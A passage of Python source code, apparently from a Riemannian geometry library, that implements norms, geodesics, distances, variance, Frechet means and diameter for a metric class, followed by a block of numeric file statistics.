"""Compute the square of the norm of a vector.
Squared norm of a vector associated to the inner product
at the tangent space at a base point.
Parameters
----------
vector : array-like, shape=[n_samples, dimension]
base_point : array-like, shape=[n_samples, dimension]
Returns
-------
sq_norm : array-like, shape=[n_samples,]
"""
sq_norm = self.inner_product(vector, vector, base_point)
return sq_norm
def norm(self, vector, base_point=None):
"""Compute norm of a vector.
Norm of a vector associated to the inner product
at the tangent space at a base point.
Note: This only works for positive-definite
Riemannian metrics and inner products.
Parameters
----------
vector : array-like, shape=[n_samples, dimension]
base_point : array-like, shape=[n_samples, dimension]
Returns
-------
norm : array-like, shape=[n_samples,]
"""
sq_norm = self.squared_norm(vector, base_point)
norm = gs.sqrt(sq_norm)
return norm
def geodesic(self, initial_point,
end_point=None, initial_tangent_vec=None,
point_type='vector'):
"""Return the geodesic as function of t.
Geodesic curve defined by either:
- an initial point and an initial tangent vector, or
- an initial point and an end point.
The geodesic is returned as a function parameterized by t.
Parameters
----------
initial_point : array-like, shape=[n_samples, dimension]
end_point : array-like, shape=[n_samples, dimension], optional
initial_tangent_vec : array-like, shape=[n_samples, dimension],
optional
point_type : str, optional
Returns
-------
path : callable
"""
point_ndim = 1
if point_type == 'matrix':
point_ndim = 2
initial_point = gs.to_ndarray(initial_point,
to_ndim=point_ndim + 1)
if end_point is None and initial_tangent_vec is None:
raise ValueError('Specify an end point or an initial tangent '
'vector to define the geodesic.')
if end_point is not None:
end_point = gs.to_ndarray(end_point,
to_ndim=point_ndim + 1)
shooting_tangent_vec = self.log(point=end_point,
base_point=initial_point)
if initial_tangent_vec is not None:
assert gs.allclose(shooting_tangent_vec, initial_tangent_vec)
initial_tangent_vec = shooting_tangent_vec
initial_tangent_vec = gs.array(initial_tangent_vec)
initial_tangent_vec = gs.to_ndarray(initial_tangent_vec,
to_ndim=point_ndim + 1)
def path(t):
"""Generate a function parameterizing the geodesic.
Parameters
----------
t : parameter value of the geodesic
Returns
-------
point_at_time_t : callable
"""
t = gs.cast(t, gs.float32)
t = gs.to_ndarray(t, to_ndim=1)
t = gs.to_ndarray(t, to_ndim=2, axis=1)
new_initial_point = gs.to_ndarray(
initial_point,
to_ndim=point_ndim + 1)
new_initial_tangent_vec = gs.to_ndarray(
initial_tangent_vec,
to_ndim=point_ndim + 1)
if point_type == 'vector':
tangent_vecs = gs.einsum('il,nk->ik',
t,
new_initial_tangent_vec)
elif point_type == 'matrix':
tangent_vecs = gs.einsum('il,nkm->ikm',
t,
new_initial_tangent_vec)
point_at_time_t = self.exp(tangent_vec=tangent_vecs,
base_point=new_initial_point)
return point_at_time_t
return path
def squared_dist(self, point_a, point_b):
"""Squared geodesic distance between two points.
Parameters
----------
point_a : array-like, shape=[n_samples, dimension]
point_b : array-like, shape=[n_samples, dimension]
Returns
-------
sq_dist : array-like, shape=[n_samples,]
"""
log = self.log(point=point_b, base_point=point_a)
sq_dist = self.squared_norm(vector=log, base_point=point_a)
return sq_dist
def dist(self, point_a, point_b):
"""Geodesic distance between two points.
Note: It only works for positive definite
Riemannian metrics.
Parameters
----------
point_a : array-like, shape=[n_samples, dimension]
point_b : array-like, shape=[n_samples, dimension]
Returns
-------
dist : array-like, shape=[n_samples,]
"""
sq_dist = self.squared_dist(point_a, point_b)
dist = gs.sqrt(sq_dist)
return dist
def variance(self,
points,
weights=None,
base_point=None,
point_type='vector'):
"""Variance of (weighted) points wrt a base point.
Parameters
----------
points: array-like, shape=[n_samples, dimension]
weights: array-like, shape=[n_samples, 1], optional
"""
if point_type == 'vector':
points = gs.to_ndarray(points, to_ndim=2)
if point_type == 'matrix':
points = gs.to_ndarray(points, to_ndim=3)
n_points = gs.shape(points)[0]
if weights is None:
weights = gs.ones((n_points, 1))
weights = gs.array(weights)
weights = gs.to_ndarray(weights, to_ndim=2, axis=1)
sum_weights = gs.sum(weights)
if base_point is None:
base_point = self.mean(points, weights)
variance = 0.
sq_dists = self.squared_dist(base_point, points)
variance += gs.einsum('nk,nj->j', weights, sq_dists)
variance = gs.array(variance)
variance /= sum_weights
variance = gs.to_ndarray(variance, to_ndim=1)
variance = gs.to_ndarray(variance, to_ndim=2, axis=1)
return variance
def mean(self, points,
weights=None,
n_max_iterations=32,
epsilon=EPSILON,
point_type='vector',
mean_method='default',
verbose=False):
"""Frechet mean of (weighted) points.
Parameters
----------
points : array-like, shape=[n_samples, dimension]
weights : array-like, shape=[n_samples, 1], optional
verbose : bool, optional
Returns
-------
mean : array-like
the Frechet mean of points, a point on the manifold
"""
if mean_method == 'default':
# TODO(nina): Profile this code to study performance,
# i.e. what to do with sq_dists_between_iterates.
def while_loop_cond(iteration, mean, variance, sq_dist):
result = ~gs.logical_or(
gs.isclose(variance, 0.),
gs.less_equal(sq_dist, epsilon * variance))
return result[0, 0] or iteration == 0
def while_loop_body(iteration, mean, variance, sq_dist):
logs = self.log(point=points, base_point=mean)
tangent_mean = gs.einsum('nk,nj->j', weights, logs)
tangent_mean /= sum_weights
mean_next = self.exp(
tangent_vec=tangent_mean,
base_point=mean)
sq_dist = self.squared_dist(mean_next, mean)
sq_dists_between_iterates.append(sq_dist)
variance = self.variance(points=points,
weights=weights,
base_point=mean_next)
mean = mean_next
iteration += 1
return [iteration, mean, variance, sq_dist]
if point_type == 'vector':
points = gs.to_ndarray(points, to_ndim=2)
if point_type == 'matrix':
points = gs.to_ndarray(points, to_ndim=3)
n_points = gs.shape(points)[0]
if weights is None:
weights = gs.ones((n_points, 1))
weights = gs.array(weights)
weights = gs.to_ndarray(weights, to_ndim=2, axis=1)
sum_weights = gs.sum(weights)
mean = points[0]
if point_type == 'vector':
mean = gs.to_ndarray(mean, to_ndim=2)
if point_type == 'matrix':
mean = gs.to_ndarray(mean, to_ndim=3)
if n_points == 1:
return mean
sq_dists_between_iterates = []
iteration = 0
sq_dist = gs.array([[0.]])
variance = gs.array([[0.]])
last_iteration, mean, variance, sq_dist = gs.while_loop(
lambda i, m, v, sq: while_loop_cond(i, m, v, sq),
lambda i, m, v, sq: while_loop_body(i, m, v, sq),
loop_vars=[iteration, mean, variance, sq_dist],
maximum_iterations=n_max_iterations)
if last_iteration == n_max_iterations:
print('Maximum number of iterations {} reached.'
'The mean may be inaccurate'.format(n_max_iterations))
if verbose:
print('n_iter: {}, final variance: {}, final dist: {}'.format(
last_iteration, variance, sq_dist))
mean = gs.to_ndarray(mean, to_ndim=2)
return mean
if mean_method == 'frechet-poincare-ball':
lr = 1e-3
tau = 5e-3
if len(points) == 1:
return points
iteration = 0
convergence = math.inf
barycenter = points.mean(0, keepdims=True) * 0
while convergence > tau and n_max_iterations > iteration:
iteration += 1
expand_barycenter = gs.repeat(barycenter, points.shape[0], 0)
grad_tangent = 2 * self.log(points, expand_barycenter)
cc_barycenter = self.exp(lr * grad_tangent.sum(0,
keepdims=True),
barycenter)
convergence = self.dist(cc_barycenter, barycenter).max().item()
barycenter = cc_barycenter
if iteration == n_max_iterations:
warnings.warn(
'Maximum number of iterations {} reached. The '
'mean may be inaccurate'.format(n_max_iterations))
return barycenter
def adaptive_gradientdescent_mean(self, points,
weights=None,
n_max_iterations=40,
epsilon=1e-12,
init_points=[],
verbose=False):
"""Compute Frechet mean of (weighted) points using adaptive time-steps.
Frechet mean of (weighted) points using adaptive time-steps
The loss function optimized is ||M_1(x)||_x (where M_1(x) is
the tangent mean at x) rather than the mean-square-distance (MSD)
because this saves computation time.
Parameters
----------
points: array-like, shape=[n_samples, dimension]
weights: array-like, shape=[n_samples, 1], optional
init_points: array-like, shape=[n_init, dimension]
epsilon: tolerance for stopping the gradient descent
verbose: verbose mode printing the surrogate value
epsilon: tolerance for stopping the gradient descent
"""
# TODO(Xavier): This function assumes that all points are lists
# of vectors and not of matrices
n_points = gs.shape(points)[0]
if n_points == 1:
return gs.to_ndarray(points[0], to_ndim=2)
if weights is None:
weights = gs.ones((n_points, 1))
weights = gs.array(weights)
weights = gs.to_ndarray(weights, to_ndim=2, axis=1)
sum_weights = gs.sum(weights)
n_init = len(init_points)
if n_init == 0:
current_mean = points[0]
else:
current_mean = init_points[0]
tau = 1.0
iteration = 0
logs = self.log(point=points, base_point=current_mean)
current_tangent_mean = gs.einsum('nk,nj->j', weights, logs)
current_tangent_mean /= sum_weights
norm_current_tangent_mean = gs.linalg.norm(current_tangent_mean)
while (norm_current_tangent_mean > epsilon
and iteration < n_max_iterations):
iteration = iteration + 1
shooting_vector = gs.to_ndarray(
tau * current_tangent_mean,
to_ndim=2)
next_mean = self.exp(
tangent_vec=shooting_vector,
base_point=current_mean)
logs = self.log(point=points, base_point=next_mean)
next_tangent_mean = gs.einsum('nk,nj->j', weights, logs)
next_tangent_mean /= sum_weights
norm_next_tangent_mean = gs.linalg.norm(next_tangent_mean)
if verbose:
print(
"Iter {0}: tau= {1}, "
"norm_current_tangent_mean = {2}".format(
iter, tau, norm_current_tangent_mean))
if norm_next_tangent_mean < norm_current_tangent_mean:
current_mean = next_mean
current_tangent_mean = next_tangent_mean
norm_current_tangent_mean = norm_next_tangent_mean
tau = max(1.0, 1.0511111 * tau)
else:
tau = tau * 0.8
if iteration == n_max_iterations:
warnings.warn(
'Maximum number of iterations {} reached.'
'The mean may be inaccurate'.format(n_max_iterations))
return gs.to_ndarray(current_mean, to_ndim=2)
def diameter(self, points):
"""Give the distance between two farthest points.
Distance between the two points that are farthest away from each other
in points.
Parameters
----------
points
Returns
-------
diameter
"""
diameter = 0.0
n_points = points.shape[0]
for i in range(n_points - 1):
dist_to_neighbors = self.dist(points[i, :], points[i + 1:, :])
dist_to_farthest_neighbor = gs.amax(dist_to_neighbors)
diameter = gs.maximum(diameter, dist_to_farthest_neighbor)
return diameter
def closest_neighbor_index(self, point, neighbors):
"""Closest neighbor of point among neighbors.
Parameters
----------
point
neighbors
Returns
-------
closest_neighbor_index
"""
dist = self.dist(point, neighbors)
closest_neighbor_index = gs.argmin(dist)
return closest_neighbor_index
| 33.315789
| 79
| 0.557987
| 2,505
| 21,522
| 4.552495
| 0.120559
| 0.038583
| 0.038057
| 0.040775
| 0.472466
| 0.372939
| 0.334883
| 0.273413
| 0.257804
| 0.215714
| 0
| 0.010714
| 0.349456
| 21,522
| 645
| 80
| 33.367442
| 0.8038
| 0.232599
| 0
| 0.243077
| 0
| 0
| 0.049
| 0.003026
| 0
| 0
| 0
| 0.003101
| 0.012308
| 1
| 0.064615
| false
| 0
| 0.015385
| 0
| 0.153846
| 0.009231
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|